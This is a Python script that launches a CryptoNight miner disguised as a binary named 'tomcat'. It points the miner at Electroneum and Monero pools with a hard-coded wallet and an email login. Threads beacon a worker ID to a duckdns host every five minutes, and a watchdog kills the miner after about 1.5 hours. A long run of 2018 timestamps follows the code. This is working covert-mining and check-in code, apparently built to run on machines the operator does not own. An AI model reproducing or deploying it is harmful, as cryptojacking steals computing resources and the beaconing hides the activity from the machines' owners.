import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:04.257755
#2018-02-17 16:54:04.381939
#2018-02-17 18:41:03.352821
#2018-02-17 20:28:07.410061
#2018-02-17 22:16:05.406058
#2018-02-18 00:00:08.902243
#2018-02-18 01:51:06.257929
#2018-02-18 03:39:03.562228
#2018-02-18 05:26:07.117991
#2018-02-18 07:18:06.543234
#2018-02-18 09:07:04.944083
#2018-02-18 10:53:01.346091
#2018-02-18 12:39:07.158594
#2018-02-18 14:26:07.292941
#2018-02-18 16:16:04.177958
#2018-02-18 18:04:05.154263
#2018-02-18 19:51:05.634641
#2018-02-18 21:39:01.596047
#2018-02-18 23:26:07.061165
#2018-02-19 01:13:06.832363
#2018-02-19 02:59:01.682526
#2018-02-19 04:46:03.541732
#2018-02-19 06:31:05.623834
#2018-02-19 08:20:08.831879
#2018-02-19 10:09:06.208975
#2018-02-19 11:58:06.284541
#2018-02-19 13:45:04.972709
#2018-02-19 15:35:04.496123
#2018-02-19 17:22:08.017735
#2018-02-19 19:11:05.107615
#2018-02-19 20:57:06.452101
#2018-02-19 22:45:01.725783
#2018-02-20 00:29:08.073187
#2018-02-20 02:17:01.765123
#2018-02-20 04:07:03.493143
#2018-02-20 05:50:07.342574
#2018-02-20 07:35:06.247904
#2018-02-20 09:19:08.282096
#2018-02-20 11:03:01.744288
#2018-02-20 12:49:08.457067
#2018-02-20 14:34:06.778604
#2018-02-20 16:20:03.967399
#2018-02-20 18:09:08.126049
#2018-02-20 20:01:01.432628
#2018-02-20 21:47:10.635826
#2018-02-20 23:28:05.177773
#2018-02-21 01:12:07.510190
#2018-02-21 02:59:06.302848
#2018-02-21 04:47:06.750139
#2018-02-21 06:36:07.634481
#2018-02-21 08:22:01.454266
#2018-02-21 10:07:04.199093
#2018-02-21 11:54:10.050863
#2018-02-21 13:45:07.970265
#2018-02-21 15:34:01.739219
#2018-02-21 17:23:08.779596
#2018-02-21 19:11:08.484498
#2018-02-21 20:59:06.978465
#2018-02-21 22:46:04.465049
#2018-02-22 00:35:07.488248
#2018-02-22 02:22:07.678987
#2018-02-22 04:10:09.508757
#2018-02-22 05:55:03.659299
#2018-02-22 07:41:02.139417
#2018-02-22 09:29:07.582484
#2018-02-22 11:14:08.744242
#2018-02-22 13:01:03.874799
#2018-02-22 14:48:09.477611
#2018-02-22 16:34:08.804202
#2018-02-22 18:21:01.428171
#2018-02-22 20:13:04.262107
#2018-02-22 21:59:04.017489
#2018-02-22 23:46:08.716316
#2018-02-23 01:35:08.799334
#2018-02-23 03:23:07.450241
#2018-02-23 05:09:06.517120
#2018-02-23 06:55:05.455242
#2018-02-23 08:46:05.745106
#2018-02-23 11:02:05.912478
#2018-02-23 12:58:02.111199
#2018-02-23 14:42:06.154754
#2018-02-23 16:30:03.438579
#2018-02-23 18:16:05.805034
#2018-02-23 20:00:08.064213
#2018-02-23 21:43:08.331352
#2018-02-23 23:36:06.691962
#2018-02-24 01:25:09.181287
#2018-02-24 03:15:09.398414
#2018-02-24 05:01:03.897835
#2018-02-24 06:49:03.202419
#2018-02-24 08:41:03.474880
#2018-02-24 10:25:01.741909
#2018-02-24 12:20:01.284348
#2018-02-24 14:13:01.682799
#2018-02-24 15:59:07.212522
#2018-02-24 17:53:07.640151
#2018-02-24 19:40:06.647313
#2018-02-24 21:27:05.784480
#2018-02-25 00:10:06.473982
#2018-02-25 03:20:08.602081
#2018-02-25 07:04:07.025226